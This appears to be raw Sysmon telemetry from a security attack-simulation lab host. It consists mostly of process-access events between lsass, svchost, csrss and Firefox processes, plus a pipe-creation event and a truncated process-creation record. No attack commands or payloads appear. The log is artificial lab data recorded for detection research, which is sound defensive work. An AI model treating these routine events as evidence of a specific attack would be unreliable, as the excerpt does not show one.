Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.028{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.027{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.027{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.027{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.027{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.027{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.027{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.026{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.026{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.026{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.026{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.026{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.026{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.026{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000048275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:38.023{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.7.30591850C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-E66B-63C7-9B06-00000000AF02}33044516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e86462|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a93e85|C:\Program Files\Mozilla Firefox\xul.dll+1a968e2|C:\Program Files\Mozilla Firefox\xul.dll+17e5104|C:\Program Files\Mozilla Firefox\xul.dll+1ac03d9|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1|C:\Program Files\Mozilla Firefox\xul.dll+472a2ec|C:\Program Files\Mozilla Firefox\xul.dll+472b10d|C:\Program Files\Mozilla Firefox\xul.dll+20599f2|C:\Program Files\Mozilla Firefox\firefox.exe+1e99e|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000048273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000048267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045480C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000048266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.016{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.6.1178872536\1753696433" -childID 5 -isForBrowser -prefsHandle 4640 -prefMapHandle 4472 -prefsLen 31532 -prefMapSize 234522 -jsInitHandle 888 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 